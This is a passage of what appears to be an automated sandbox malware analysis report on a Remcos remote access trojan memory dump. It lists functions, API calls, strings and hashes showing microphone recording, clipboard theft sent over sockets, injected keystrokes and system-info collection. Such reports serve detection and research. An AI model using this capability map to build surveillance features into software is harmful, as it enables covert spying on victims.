                                                • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                Function 00455139 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: DecodePointer
                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                • API String ID: 3527080286-3064271455
                                                • Opcode ID: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                • Opcode Fuzzy Hash: 3eb206b15bda214751c6835efce86a307732660d26cd42cbd6c0713da10ca2d5
                                                • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                  • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,00403AF3,00465324), ref: 0041B633
                                                • Sleep.KERNEL32(00000064), ref: 00416688
                                                • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                • API String ID: 1462127192-2001430897
                                                • Opcode ID: 826bb05371ff64d740857fa337f72034cbc796444b6efc95c58373138809deed
                                                • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                • Opcode Fuzzy Hash: 826bb05371ff64d740857fa337f72034cbc796444b6efc95c58373138809deed
                                                • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                Download Yara Rule
                                                APIs
                                                • _strftime.LIBCMT ref: 00401AD3
                                                  • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                • API String ID: 3809562944-3643129801
                                                • Opcode ID: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                • Opcode Fuzzy Hash: 05fbe3f0275308aa01def130e1c9f559704be22902734a160a2ccb4d88025906
                                                • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                • waveInStart.WINMM ref: 00401A81
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                • String ID: XCG$`=G$x=G
                                                • API String ID: 1356121797-903574159
                                                • Opcode ID: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                • Opcode Fuzzy Hash: ccd0c3bdb441db855719f52f26becbf2123e5d26e4d3fe3fdac9f84fbce65878
                                                • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                Function 0041C96F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                  • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                  • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                  • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                • TranslateMessage.USER32(?), ref: 0041C9FB
                                                • DispatchMessageA.USER32(?), ref: 0041CA05
                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                • String ID: Remcos
                                                • API String ID: 1970332568-165870891
                                                • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                Function 0044B450 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                • Opcode Fuzzy Hash: a2fd919219da5dceb4fadf527de6f56cb4df21625ee46edd218c435833ca4f57
                                                • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                Function 00452B2A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                • __alloca_probe_16.LIBCMT ref: 00452C91
                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                • __freea.LIBCMT ref: 00452DAA
                                                • __freea.LIBCMT ref: 00452DB6
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                • String ID:
                                                • API String ID: 201697637-0
                                                • Opcode ID: 51fcd5d0f12c7252ccb3cdd53779652c124c35418bee1affee7c5fbc1305f75c
                                                • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                • Opcode Fuzzy Hash: 51fcd5d0f12c7252ccb3cdd53779652c124c35418bee1affee7c5fbc1305f75c
                                                • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                Function 004443F9 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                  • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                  • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                  • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                • _free.LIBCMT ref: 00444714
                                                • _free.LIBCMT ref: 0044472D
                                                • _free.LIBCMT ref: 0044475F
                                                • _free.LIBCMT ref: 00444768
                                                • _free.LIBCMT ref: 00444774
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                • String ID: C
                                                • API String ID: 1679612858-1037565863
                                                • Opcode ID: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                • Instruction ID: 3c523a64da6f7cdf058c983f33271b3c05ff2f19a58e511a78fa6d1555c07658
                                                • Opcode Fuzzy Hash: b3bb612f52cd01851518acec42876c64f75404bfee4e20e1c1da8053f10e2069
                                                • Instruction Fuzzy Hash: 19B13975A012199FEB24DF18C885BAEB7B4FB49304F1485AEE909A7350D739AE90CF44
                                                Function 004139C7 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 228COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: tcp$udp
                                                • API String ID: 0-3725065008
                                                • Opcode ID: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                • Instruction ID: e59cad8d3053530f07be13ad944632c35d9115139dfdf9e987abb4c2b311e0ee
                                                • Opcode Fuzzy Hash: feee9516c16efef68815b89ade9cbffe5bf55ce5106af849680fee818ce7e4b0
                                                • Instruction Fuzzy Hash: 9171AB316083128FDB24CE5584847ABB6E4AF84746F10043FF885A7352E778DE85CB9A
                                                Function 00401768 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                                Download Yara Rule
                                                APIs
                                                • ExitThread.KERNEL32 ref: 004017F4
                                                  • Part of subcall function 00433519: EnterCriticalSection.KERNEL32(00470D18,00475B70,00475BF0,?,0040179E,00475BF0), ref: 00433524
                                                  • Part of subcall function 00433519: LeaveCriticalSection.KERNEL32(00470D18,?,0040179E,00475BF0), ref: 00433561
                                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00473EE8,00000000), ref: 00401902
                                                  • Part of subcall function 004338A5: __onexit.LIBCMT ref: 004338AB
                                                • __Init_thread_footer.LIBCMT ref: 004017BC
                                                  • Part of subcall function 004334CF: EnterCriticalSection.KERNEL32(00470D18,00475BF0,?,004017C1,00475BF0,00000000), ref: 004334D9
                                                  • Part of subcall function 004334CF: LeaveCriticalSection.KERNEL32(00470D18,?,004017C1,00475BF0,00000000), ref: 0043350C
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CriticalSection$EnterLeave$ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                                • String ID: T=G$p[G$>G$>G
                                                • API String ID: 1596592924-2461731529
                                                • Opcode ID: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                • Instruction ID: b2aa677fe1363808454ef9d3704f93b9908b7cd688e3fd59dcdd6ad405d7ff49
                                                • Opcode Fuzzy Hash: 8f70ea2b40fb44211d0b69bbfe51e678a1d722ca5741e51af6e8456a38407156
                                                • Instruction Fuzzy Hash: 0D41A0316042019BC324FB65DCA6EAE73A4EB94318F00453FF54AA71F2DF78A945C65E
                                                Function 00406BE9 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 97fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D08
                                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,0000000A,00000000,00000000), ref: 00406D18
                                                  • Part of subcall function 0040455B: WaitForSingleObject.KERNEL32(?,000000FF,?,?,0040460E,00000000,?,?), ref: 0040456A
                                                  • Part of subcall function 0040455B: SetEvent.KERNEL32(?,?,?,0040460E,00000000,?,?), ref: 00404588
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                • String ID: .part
                                                • API String ID: 1303771098-3499674018
                                                • Opcode ID: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                • Instruction ID: a9f2b94bfe891e644ef5b97f564769cd4b441703f4f7d546a0b6aea2ef9939f1
                                                • Opcode Fuzzy Hash: bc587de7adb1460b3aabd07d1d3e6798b8d85c5b62109ba090974b2b68d51c1e
                                                • Instruction Fuzzy Hash: 1C31C2715083019FD210EF21DD459AFB7A8FB85715F40093FF9C6A21A1DB38AA48CB9A
                                                Function 0041A81D Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00412584: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?), ref: 004125A6
                                                  • Part of subcall function 00412584: RegQueryValueExW.ADVAPI32(?,0040E0BA,00000000,00000000,?,00000400), ref: 004125C5
                                                  • Part of subcall function 00412584: RegCloseKey.ADVAPI32(?), ref: 004125CE
                                                  • Part of subcall function 0041B15B: GetCurrentProcess.KERNEL32(?,?,?,0040C914,WinDir,00000000,00000000), ref: 0041B16C
                                                • _wcslen.LIBCMT ref: 0041A8F6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                                • String ID: .exe$:@$XCG$http\shell\open\command$program files (x86)\$program files\
                                                • API String ID: 37874593-703403762
                                                • Opcode ID: 8d7f7000506fb44ae307e9e559f48fe1fd4854344d8ef950826ae216f426f9bc
                                                • Instruction ID: cf464564bb47d370653928ac6653466accee15d45f6204cdc17a1bec324f9b19
                                                • Opcode Fuzzy Hash: 8d7f7000506fb44ae307e9e559f48fe1fd4854344d8ef950826ae216f426f9bc
                                                • Instruction Fuzzy Hash: 3021B8727001043BDB04BAB58C96DEE366D9B85358F14083FF402F72C2ED3C9D5942A9
                                                Function 00449950 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 004499AA
                                                • __alloca_probe_16.LIBCMT ref: 004499E2
                                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042CE53,?,?,?,00449BA1,00000001,00000001,?), ref: 00449A30
                                                • __alloca_probe_16.LIBCMT ref: 00449AC7
                                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00449B2A
                                                • __freea.LIBCMT ref: 00449B37
                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                • __freea.LIBCMT ref: 00449B40
                                                • __freea.LIBCMT ref: 00449B65
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                                • String ID:
                                                • API String ID: 3864826663-0
                                                • Opcode ID: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                • Instruction ID: d3450b84a68f20df6837e20b70452335b33749c243a385fd48b45426a0ff81fe
                                                • Opcode Fuzzy Hash: aa8dcda0c36fa9ba79fa8fe966d6c0ac5dcd12a00e8d66bfa7c578b9a9788745
                                                • Instruction Fuzzy Hash: 89511572610246AFFB258F65DC81EBB77A9EB44754F15462EFC04E6240EF38EC40E668
                                                Function 00418ABE Relevance: 12.1, APIs: 8, Instructions: 117keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • SendInput.USER32 ref: 00418B08
                                                • SendInput.USER32(00000001,?,0000001C), ref: 00418B30
                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B57
                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B75
                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418B95
                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BBA
                                                • SendInput.USER32(00000001,0000001C,0000001C), ref: 00418BDC
                                                • SendInput.USER32(00000001,?,0000001C), ref: 00418BFF
                                                  • Part of subcall function 00418AB1: MapVirtualKeyA.USER32(00000000,00000000), ref: 00418AB7
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InputSend$Virtual
                                                • String ID:
                                                • API String ID: 1167301434-0
                                                • Opcode ID: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                • Instruction ID: ee8b26819532887277ba411a2a2a0296f2420856d0f10470abe43a11d9a37015
                                                • Opcode Fuzzy Hash: 88f93acc81d4616b4190e12117d1b14dafb1e9928c91053c24dee7c09840eeb6
                                                • Instruction Fuzzy Hash: 3231A471248345AAE210DF65D841FDFFBECAFC5B44F04080FB98457291DAA4D98C87AB
                                                Function 00415A45 Relevance: 12.0, APIs: 8, Instructions: 46clipboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenClipboard.USER32 ref: 00415A46
                                                • EmptyClipboard.USER32 ref: 00415A54
                                                • CloseClipboard.USER32 ref: 00415A5A
                                                • OpenClipboard.USER32 ref: 00415A61
                                                • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                • CloseClipboard.USER32 ref: 00415A89
                                                  • Part of subcall function 00404468: send.WS2_32(?,00000000,00000000,00000000), ref: 004044FD
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                • String ID:
                                                • API String ID: 2172192267-0
                                                • Opcode ID: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                • Instruction ID: 9b100a12d13cc6c4196ee8fc3e520842cce62831b2d72284ea91ff5550736cd9
                                                • Opcode Fuzzy Hash: ed1c07982b29d0ead8c7efce27f1f73f7a3c6531811b5a16733390c9f1490fe0
                                                • Instruction Fuzzy Hash: A10152312083009FC314BB75EC5AAEE77A5AFC0762F41457EFD06861A2DF38C845D65A
                                                Function 00447E3A Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • _free.LIBCMT ref: 00447EBC
                                                • _free.LIBCMT ref: 00447EE0
                                                • _free.LIBCMT ref: 00448067
                                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045D478), ref: 00448079
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0047179C,000000FF,00000000,0000003F,00000000,?,?), ref: 004480F1
                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,004717F0,000000FF,?,0000003F,00000000,?), ref: 0044811E
                                                • _free.LIBCMT ref: 00448233
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                • String ID:
                                                • API String ID: 314583886-0
                                                • Opcode ID: 27ecba2f8841fd9bc374cbfe0ae16a2ddc94f833dde90b0adb5aed01379e1676
                                                • Instruction ID: d74e55ca02e924b9256a88f94e7be2aa31ce1fd8fbfcff02d88bcfbefc6cbd9d
                                                • Opcode Fuzzy Hash: 27ecba2f8841fd9bc374cbfe0ae16a2ddc94f833dde90b0adb5aed01379e1676
                                                • Instruction Fuzzy Hash: 32C12871904205ABFB24DF799C41AAE7BB8EF46314F2441AFE484A7351EB388E47C758
                                                Function 0044F806 Relevance: 10.7, APIs: 7, Instructions: 204COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID:
                                                • API String ID: 269201875-0
                                                • Opcode ID: 714fb272f4c7917b76c675d30aae230e33aac3baeb4f8630fb8b603ed7da88bc
                                                • Instruction ID: 5fecc71d39e6a90402c47f7728bb4f6831cdfeb90858b0dfc168023e2edb8b83
                                                • Opcode Fuzzy Hash: 714fb272f4c7917b76c675d30aae230e33aac3baeb4f8630fb8b603ed7da88bc
                                                • Instruction Fuzzy Hash: 2361BFB1900205AFEB20DF69C841BAABBF4EB45720F24417BE944FB392E7349D45CB59
                                                Function 00443F7B Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 187COMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,00434423,?,?,00437227,?,?,00000000,00475B70,?,0040CC87,00434423,?,?,?,?), ref: 00446B31
                                                • _free.LIBCMT ref: 00444086
                                                • _free.LIBCMT ref: 0044409D
                                                • _free.LIBCMT ref: 004440BC
                                                • _free.LIBCMT ref: 004440D7
                                                • _free.LIBCMT ref: 004440EE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: _free$AllocateHeap
                                                • String ID: J7D
                                                • API String ID: 3033488037-1677391033
                                                • Opcode ID: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                • Instruction ID: b5a2c1f2d034459fb850ff781f480331835685433a1d37f27cfcf8091ebf3f31
                                                • Opcode Fuzzy Hash: 38e5a99fceb1209b970ed7ac5d3209ab3957ca8cf69c4f68c5a23a15f0ca7666
                                                • Instruction Fuzzy Hash: 9251E371A00604AFEB20DF6AC841B6AB3F4EF95724F14416EE909D7251E739ED15CB88
                                                Function 0044A0C3 Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                • GetConsoleCP.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,0044A838,?,00000000,00000000,00000000,00000000,0000000C), ref: 0044A105
                                                • __fassign.LIBCMT ref: 0044A180
                                                • __fassign.LIBCMT ref: 0044A19B
                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,00000000,00000005,00000000,00000000), ref: 0044A1C1
                                                • WriteFile.KERNEL32(?,00000000,00000000,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A1E0
                                                • WriteFile.KERNEL32(?,?,00000001,0044A838,00000000,?,?,?,?,?,?,?,?,?,0044A838,?), ref: 0044A219
                                                Memory Dump Source
                                                • Source File: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_12_2_400000_MSBuild.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                • String ID:
                                                • API String ID: 1324828854-0
